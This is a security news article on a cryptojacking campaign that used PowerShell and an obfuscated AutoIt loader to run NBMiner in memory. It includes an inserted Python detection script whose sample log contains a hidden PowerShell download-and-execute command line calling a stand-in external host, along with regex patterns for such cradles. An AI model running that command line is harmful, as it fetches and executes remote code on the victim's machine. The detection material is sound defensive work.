A cryptojacking campaign was identified in which an attacker hijacked trusted Windows utilities to covertly mine cryptocurrency, marking the first known use of an obfuscated AutoIt loader to deliver an NBMiner cryptominer.

In a Sept. 3 blog post, Darktrace said it first detected and then contained the threat when a threat actor attempted to use a PowerShell script to download and run NBMiner directly in memory on one of its retail and ecommerce customers.

NBMiner cryptocurrency mining software runs on Windows and Linux and uses Nvidia and AMD GPUs to perform mining calculations and validate transactions on blockchain networks. AutoIt loaders use the legitimate scripting language AutoIt to download, decrypt, and execute a secondary, more potent malware payload.

The Darktrace researchers said the compromise was detected on July 22, when the research team saw the bad actor use a new PowerShell agent during a connection to an external endpoint — indicating an attempt at remote code execution.
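The sequence Darktrace describes (a PowerShell process launched with a download-and-execute command line, then connecting to an external endpoint) is one that endpoint telemetry can be correlated on. The following is an added example, not Darktrace's or any vendor's detection logic: it correlates constructed process-creation and network-connection events by process id and flags a PowerShell process only when it shows both an in-memory download-and-run command line and an outbound connection. The Sysmon-like field names, the sample events and the list of internal address ranges are all assumptions for the demonstration.

```python
"""Heuristic correlation of PowerShell download-cradle command lines with
outbound connections.  Added example; the events are constructed and the
field layout (EventID 1 = process create, 3 = network connect, one JSON
object per line) mirrors Sysmon in simplified form, which is an assumption."""
import ipaddress
import json
import re
from collections import defaultdict

# Keywords typical of "fetch code and run it without touching disk" command
# lines.  Public detection rules key on the same indicators; matching is
# case-insensitive so IEX / iex / Iex are all caught.
DOWNLOAD_MARKERS = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", re.I)
EXEC_MARKERS = re.compile(r"\biex\b|invoke-expression|-encodedcommand|\s-e(nc)?\s|frombase64string", re.I)
EVASION_MARKERS = re.compile(r"-nop\b|-noprofile|-w(indowstyle)?\s+hidden|-e(xecutionpolicy|p)\s+bypass", re.I)

# Ranges treated as "internal"; adjust to the monitored estate (assumption).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

# Constructed sample telemetry: one compromised-looking process (pid 4120)
# and one ordinary scheduled backup script (pid 5000).  203.0.113.10 is a
# documentation address used here as the stand-in external endpoint.
SAMPLE_LOG = r"""
{"EventID": 1, "ProcessId": 4120, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/loader.ps1')", "User": "CORP\\jdoe"}
{"EventID": 3, "ProcessId": 4120, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "DestinationIp": "203.0.113.10", "DestinationPort": 80, "Initiated": true}
{"EventID": 1, "ProcessId": 5000, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1", "User": "CORP\\svc_backup"}
{"EventID": 3, "ProcessId": 5000, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "DestinationIp": "10.0.0.5", "DestinationPort": 445, "Initiated": true}
"""


def is_external(ip: str) -> bool:
    """True when the destination lies outside the configured internal ranges."""
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def cradle_indicators(cmdline: str) -> list[str]:
    """Return the cradle traits a command line exhibits (empty for benign use)."""
    hits = []
    if DOWNLOAD_MARKERS.search(cmdline):
        hits.append("download")
    if EXEC_MARKERS.search(cmdline):
        hits.append("in-memory-exec")
    if EVASION_MARKERS.search(cmdline):
        hits.append("hidden-or-policy-bypass")
    return hits


def analyze(log_text: str) -> list[dict]:
    """Correlate process creations with outbound connections by ProcessId and
    emit one finding per PowerShell process that both downloads and executes."""
    procs, conns = {}, defaultdict(set)
    for line in log_text.strip().splitlines():
        ev = json.loads(line)
        if ev["EventID"] == 1 and ev["Image"].lower().endswith("powershell.exe"):
            procs[ev["ProcessId"]] = ev
        elif ev["EventID"] == 3 and ev.get("Initiated") and is_external(ev["DestinationIp"]):
            conns[ev["ProcessId"]].add(ev["DestinationIp"])

    findings = []
    for pid, ev in procs.items():
        traits = cradle_indicators(ev["CommandLine"])
        # A policy-bypass flag alone is common in legitimate automation; require
        # the download + execute pair before raising anything.
        if "download" not in traits or "in-memory-exec" not in traits:
            continue
        external = sorted(conns.get(pid, ()))
        findings.append({
            "pid": pid,
            "user": ev["User"],
            "traits": traits,
            "external_destinations": external,
            # cradle plus a real outbound connection is the strongest signal
            "severity": "high" if external else "medium",
        })
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(json.dumps(finding))
```

Run as a script it prints one finding, for pid 4120, with severity "high"; the backup script with its execution-policy flag is deliberately left alone, which is the trade-off a detection like this has to make between catching hidden in-memory loaders and drowning analysts in ordinary administrative PowerShell.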

Security experts said that while cryptojacking often gets portrayed as more of an inconvenience than a major enterprise threat, it’s a symptom of a broader endpoint security challenge.

“If your endpoint can be cryptojacked, then credentials, secrets and sessions on that endpoint could also be ‘jacked’ — leading to broader identity risks as attackers use these to pivot into the cloud or other systems,” said James Maude, Field CTO at BeyondTrust.

Maude added that this attack chain is typical of modern threats combining scripts with legitimate native tools such as PowerShell as well as signed third-party binaries from trusted vendors. This hybrid living-off-the-land approach, which pairs legitimate applications with anti-sandboxing evasion techniques, allows threat actors to evade detection effectively.

Jason Soroko, senior fellow at Sectigo, added that organizations should treat modern cryptojacking as an intrusion signal, not a harmless nuisance. Soroko said adversaries can land through script-based payloads that execute directly in memory and then hide inside trusted Windows processes, while quietly elevating privileges through known user account control (UAC) weaknesses.

“These techniques blend with normal system behavior and exploit default configurations, which means traditional signature tools often remain quiet,” said Soroko. “Mining payloads also create real costs in energy and reliability, and they may serve as cover for a broader campaign that scouts the environment and harvests credentials. Activity that looks like a minor compliance issue can therefore be the first visible symptom of unauthorized control.”